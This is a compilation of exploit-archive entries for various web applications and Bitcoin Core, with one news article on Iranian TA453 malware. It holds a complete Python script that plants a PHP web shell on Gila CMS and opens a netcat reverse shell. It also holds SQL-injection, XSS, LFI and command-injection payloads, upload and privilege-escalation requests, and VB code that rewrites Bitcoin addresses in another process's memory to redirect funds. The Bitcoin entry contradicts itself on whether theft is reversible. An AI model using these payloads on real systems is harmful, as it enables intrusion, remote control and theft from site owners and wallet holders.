Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Gila CMS 1.10.9 Remote Code Execution

DANGEROUS MAILER-CLONED version 2.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : DANGEROUS MAILER-CLONED V2.0 information disclosure Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://thefortune39.company.site/CLONED-VERSION-OF-DANGEROUS-MAILER-p199233403                                    || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] all users and passwords saved as clear text[+] use payload : /storage/info.txt[+] login : /login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DANGEROUS MAILER-CLONED 2.0 Information Disclosure

DaillyTools suffers from a remote command execution vulnerability.

    ====================================================================================================================================| # Title     : DaillyTools v1 command execution Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://github.com/islamoc/DaillyTools                                                                              || # Dork      : Coded by Mennouchi Islam Azeddine                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : PHP_Comments.php[+] Line : 20      Function Name : exec      Variables     :$arr[+] PHP_Comments.php?arr= pwd Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DaillyTools Remote Command Execution

CakePHP Test Suite version 2.7.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CakePHP Test Suite v2.7.0 Xss Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://cakephp.org/                                                                                               |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload in : <script>alert(/indoushka/);</script> or <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] create new user and post comment or in search box use payload [+] http://127.0.0.1/forum.groupethika.com/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CakePHP Test Suite 2.7.0 Cross Site Scripting

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] LFI Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] the infected file : index.php      <?php      require "config.php";       error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));       $page=$_GET['page'];       $filename="content/$page.php";       if (!file_exists($filename))        {         include "content/home.php";        }            else        {@include "content/$page.php";}        ?>[+] LFI : /index.php?page= [Ev!l]====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Local File Inclusion

AGVirtues Galeria version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : AGVirtues Galeria v2.0 Auth By Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/                                                                                            || # Dork      : galeria/album.php?id=                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass : ADMIN' OR 1=1#[+] http://wexpomarmorecombr/galeria/admin/album.php Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AGVirtues Galeria 2.0 SQL Injection

Memory management and protection issues in Bitcoin Core v22 allows attackers to modify the stored sending address within the app's memory, potentially allowing them to redirect Bitcoin transactions to wallets of their own choosing.

The Bitcoin app is vulnerable to hackers!

Description

Bitcoin Core Latest version 22.0 suffers from a memory management issue that enables attackers to redirect funds to their own Bitcoin address.

DATE(S) ISSUED: 06/22/2023

RISK: Critical

Businesses:

Large and medium Bitcoin miners HIGH

Home Users: LOW

Method: Remote thread execution

OVERVIEW:

The Bitcoin app on Windows is currently facing issues related to memory management and memory protection. These vulnerabilities allow attackers to modify the stored sending address within the app's memory, ultimately leading to the redirection of Bitcoin transactions to their own wallets.

Attackers Method:

The Bitcoin app is suffering from memory management issues, allowing attackers to open bitcoin’s process and search for Bitcoin wallet addresses stored in the memory. While Bitcoin uses the SHA-256 hashing algorithm to encrypt the data stored in the blocks on the blockchain, the BTC addresses themselves are not encrypted in the memory.

When a transaction occurs on the Bitcoin blockchain, it takes place through the utilization of public addresses. These public addresses are stored within the Bitcoin app prior to initiating the process.

An attacker can simply search for these BTC addresses, which consist of a string of 26-35 letters and numbers, enabling them to easily locate all the Bitcoin wallets stored in the Bitcoin app and replace them with their own.

When an attacker replaces the public address, it can result in a straightforward redirection of Bitcoin transactions to their own wallets. Due to the inherent nature of Bitcoin, this process is reversible.

This method closely resembles the widely-known point-of-sale malware called Tinypos.

My research about Tinypos can be found here:

https://securitynews.sonicwall.com/xmlpost/tinypos-a-new-multi-component-pos-family-actively-spreading-in-the-wild/

To my understanding, we can expect to see an increase in the prevalence of Bitcoin point-of-sale (POS) malware in the near future!

The major difference between Tinypos and Bitcoin malware is that Bitcoin operates in a decentralized manner without a central authority. Therefore, if you become a victim of an attack, your funds will be permanently lost!

Video of Attack:

https://www.youtube.com/watch?v=oEl4M1oZim0

In this video, I used an app called Cheat Engine to demonstrate how hacking a Bitcoin wallet works. As you can see in the video, I created a Bitcoin sending address under my name. An attacker can easily gain access to the Bitcoin memory app and replace it with another BTC wallet, causing all funds to be transferred to their own wallet during any transaction!

POC:

replace\_hash = "bc1pkwjlvljdq6huzk85d8z695v26e93dd1m0upqumkncmx640dpdu4suyukmt"   ' attacker's hash

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long

Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function VirtualQueryEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, lpBuffer As MEMORY\_BASIC\_INFORMATION, ByVal dwLength As Long) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Const PROCESS\_ALL\_ACCESS As Long = &H1F0FFF

Private Const WM\_GETTEXT As Long = &HD

Private Const WM\_SETTEXT As Long = &HC

Private Const MEM\_COMMIT As Long = &H1000

Private Const MEM\_PRIVATE As Long = &H20000

Private Const PAGE\_READWRITE As Long = &H4

Private Type MEMORY\_BASIC\_INFORMATION

    BaseAddress As Long

    AllocationBase As Long

    AllocationProtect As Long

    RegionSize As Long

    State As Long

    Protect As Long

    Type As Long

End Type

Private Sub Bitcoin\_hack ()

    Dim hWnd As Long

    Dim processId As Long

    Dim hProcess As Long

    Dim buffer As String

    Dim processName As String

    Dim searchString As String

    Dim replacementString As String

    processName = "bitcoin-qt.exe" 

    searchString = "^\[A-Za-z\]{26,35}$" ' Pattern for strings with 26-35 letters Bitcoin address

    replacementString = replace\_hash 

    hWnd = FindWindow(vbNullString, processName)

    If hWnd <> 0 Then

        ' Get the process ID

        GetWindowThreadProcessId hWnd, processId

        ' Open the process

        hProcess = OpenProcess(PROCESS\_ALL\_ACCESS, 0, processId)

        If hProcess <> 0 Then

            Dim lpMemInfo As MEMORY\_BASIC\_INFORMATION

            Dim lpBuffer As String

            Dim lpAddress As Long

            Dim bytesRead As Long

            lpAddress = 0 ' Start at the beginning of the process memory

            Do While VirtualQueryEx(hProcess, lpAddress, lpMemInfo, Len(lpMemInfo)) <> 0

                If (lpMemInfo.State = MEM\_COMMIT) And (lpMemInfo.Type = MEM\_PRIVATE) And (lpMemInfo.Protect = PAGE\_READWRITE) Then

                    ' Allocate a buffer to read the memory

                    lpBuffer = Space(lpMemInfo.RegionSize)

                    ' Read the memory

                    ReadProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal lpBuffer, lpMemInfo.RegionSize, bytesRead

                    ' Check if the buffer contains a matching string

                    If Len(lpBuffer) >= 26 And Len(lpBuffer) <= 35 And RegExpMatch(lpBuffer, searchString) Then

                        Dim writeBuffer As String

                        writeBuffer = RegExpReplace(lpBuffer, searchString, replacementString)

                        ' Write the modified text

                        WriteProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal StrPtr(writeBuffer), Len(writeBuffer), 0

                    End If

                End If

                ' Move to the next memory region

                lpAddress = lpMemInfo.BaseAddress + lpMemInfo.RegionSize

            Loop

            ' Close the process handle

            CloseHandle hProcess

        Else

            MsgBox "Failed to open the process.", vbCritical

        End If

    Else

        MsgBox "The process could not be found.", vbCritical

    End If

End Sub

Private Function RegExpMatch(ByVal text As String, ByVal pattern As String) As Boolean

    Dim regExp As Object

    Set regExp = CreateObject("VBScript.RegExp")

    With regExp

        .Global = True

        .IgnoreCase = True

        .Pattern = pattern

    End With

    RegExpMatch = regExp.Test(text)

End Function

Private Function RegExpReplace(ByVal text As String, ByVal pattern As String, ByVal replacement As String) As String

    Dim regExp As Object

    Set regExp = CreateObject("VBScript.RegExp")

    With regExp

        .Global = True

        .IgnoreCase = True

        .Pattern = pattern

    End With

    RegExpReplace = regExp.Replace(text, replacement)

End Function

Summary:

Use Cold Wallets until they fix this!

Questions ?

Nima\_bagheri79@yahoo.com

CVE-2023-37192: The Bitcoin app is vulnerable to hackers!

The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware.
"TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report.
"When given the opportunity, TA453

Endpoint Security / Malware

The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware.

"TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report.

"When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok. TA453 also employed multi-persona impersonation in its unending espionage quest."

TA453, also known by the names APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group linked to Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. Most recently, Volexity highlighted the adversary's use of an updated version of a Powershell implant called CharmPower (aka GhostEcho or POWERSTAR).

In the attack sequence discovered by the enterprise security firm in mid-May 2023, the hacking crew sent phishing emails to a nuclear security expert at a U.S.-based think tank focused on foreign affairs that delivered a malicious link to a Google Script macro that would redirect the target to a Dropbox URL hosting a RAR archive.

Present within the file is an LNK dropper that kicks off a multi-stage procedure to ultimately deploy GorjolEcho, which, in turn, displays a decoy PDF document, while covertly awaiting next-stage payloads from a remote server.

But upon realizing that the target is using an Apple computer, TA453 is said to have tweaked its modus operandi to send a second email with a ZIP archive embedding a Mach-O binary that masquerades as a VPN application, but in reality, is an AppleScript that reaches out to a remote server to download a Bash script-based backdoor called NokNok.

UPCOMING WEBINAR

🔐 Privileged Access Management: Learn How to Conquer Key Challenges

Discover different approaches to conquer Privileged Account Management (PAM) challenges and level up your privileged access security strategy.

Reserve Your Spot

NokNok, for its part, fetches as many as four modules that are capable of gathering running processes, installed applications, and system metadata as well as setting persistence using LaunchAgents.

The modules "mirror a majority of the functionality" of the modules associated with CharmPower, with NokNok sharing some source code overlaps with macOS malware previously attributed to the group in 2017.

Also put to use by the actor is a bogus file-sharing website that likely functions to fingerprint visitors and act as a mechanism to track successful victims.

"TA453 continues to adapt its malware arsenal, deploying novel file types, and targeting new operating systems," the researchers said, adding the actor "continues to work toward its same end goals of intrusive and unauthorized reconnaissance" while simultaneously complicating detection efforts.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers' Sophisticated Malware Targets Windows and macOS Users

File upload vulnerability in DuxCMS 2.1 allows attackers to execute arbitrary php code via duxcms/AdminUpload/upload.

**File type upload configuration**

Add php file type to it like this

**Upload file features**

then find one upload file features

the file is name shell.jpg and content like this.

Capturing data packets of uploaded files,and change the file suffix to php

and the packets is like this.

    POST /DuxCMS/admin.php?r=duxcms/AdminUpload/upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add
    Content-Type: multipart/form-data; boundary=---------------------------191691572411478
    Content-Length: 853
    Connection: close
    Cookie: 042_sessid_ab46d60bfa95=2020-13-9np1-77uqd8wxh-a95a9743c; phpwcmsBELang=en; loader=loaded; _utcpl=17ad82836af704761d37d9a49a32770es1; __atuvc=3%7C2; PHPSESSID=u7oug0qsfdrqa6r1l5v2kr3noh
    
    -----------------------------191691572411478
    Content-Disposition: form-data; name="class_id"
    
    0
    -----------------------------191691572411478
    Content-Disposition: form-data; name="id"
    
    WU_FILE_0
    -----------------------------191691572411478
    Content-Disposition: form-data; name="name"
    
    shell.jpg
    -----------------------------191691572411478
    Content-Disposition: form-data; name="type"
    
    image/jpeg
    -----------------------------191691572411478
    Content-Disposition: form-data; name="lastModifiedDate"
    
    2020/1/8 ä¸å4:16:35
    -----------------------------191691572411478
    Content-Disposition: form-data; name="size"
    
    35
    -----------------------------191691572411478
    Content-Disposition: form-data; name="file"; filename="shell.php"
    Content-Type: image/jpeg
    
    <?php
    
    phpinfo();
    
    ?>
    -----------------------------191691572411478--
    
    

**Access file**

After getting the file uploaded above, the file address returned by the server.Successfully uploaded the php file and executed the php file.

**Solution**

delete this configuration features.

CVE-2020-21861: Insecure configuration causes getshell · Issue #I182Y4 · 王爷/DuxCMS2.1支持php7.0以上版本 - Gitee.com

Metersphere is an open source continuous testing platform. In versions prior to 2.10.2 LTS, some key APIs in Metersphere lack permission checks. This allows ordinary users to execute APIs that can only be executed by space administrators or project administrators. For example, ordinary users can be updated as space administrators. Version 2.10.2 LTS has a patch for this issue.

**Summary**

目前metersphere 一些关键的API缺少了权限检查，比如workspace中的/setting/workspace/member/update，/setting/user/special/ws/member/add, /special/ws/member/delete/{workspaceId}/{userId} 以及project相关的API。

**PoC**

以workspace中的/setting/workspace/member/update利用为例

1 user1 是workspace1的空间管理员

2 user2 是workspace1的成员

3 user1 更新user2的信息，比如将其更新为空间管理员

4 使用burpsuite拦截请求

    以workspace中的/setting/workspace/member/update 为例
    
    POST /setting/workspace/member/update HTTP/1.1
    Host: 192.168.213.128:8081
    Content-Length: 144
    Accept-Language: zh-CN
    WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
    Content-Type: application/json
    Accept: application/json, text/plain, */*
    CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
    X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
    PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
    Origin: http://192.168.213.128:8081
    Referer: http://192.168.213.128:8081/
    Accept-Encoding: gzip, deflate
    Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
    Connection: close
    
    {"id":"user2","name":"user2","email":"user2@test.com","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}
    

5 将上述请求中的CSRF-TOKEN和X-AUTH-TOKEN替换成user2的，即以user2的身份执行请求

6 发现执行结果成功，即普通用户可以执行管理员才能执行的update

**Impact**

普通用户可以执行空间管理员或者project管理员才能执行的API，比如可以将普通用户更新成空间管理员。

Tag

#windows